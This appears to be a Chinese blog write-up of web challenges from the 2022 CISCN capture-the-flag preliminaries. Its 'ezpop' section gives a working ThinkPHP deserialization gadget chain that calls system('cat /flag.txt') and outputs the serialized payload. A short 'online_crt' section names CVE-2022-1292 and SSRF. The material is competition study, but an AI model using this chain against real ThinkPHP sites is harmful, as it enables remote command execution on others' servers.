[2022 CISCN]初赛 web题目复现

发布时间:2024-05-02 15:01

ezpop

源码泄露www.zip,用网上的链子直接打



namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag.txt"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

online_crt

考点:

CVE-2022-1292

SSRF

项目分析

项目后端为python+go,其中python部署在外网,go通过python转发到内网

先看python,一共有四个路由:

  • /为主界面

  • /getcrt生成一个x509证书

  • /createlink调用c_rehash创建证书链接

  • /proxy通过代理访问go内网服务

ItVuer - 免责声明 - 关于我们 - 联系我们

本网站信息来源于互联网,如有侵权请联系:561261067@qq.com

桂ICP备16001015号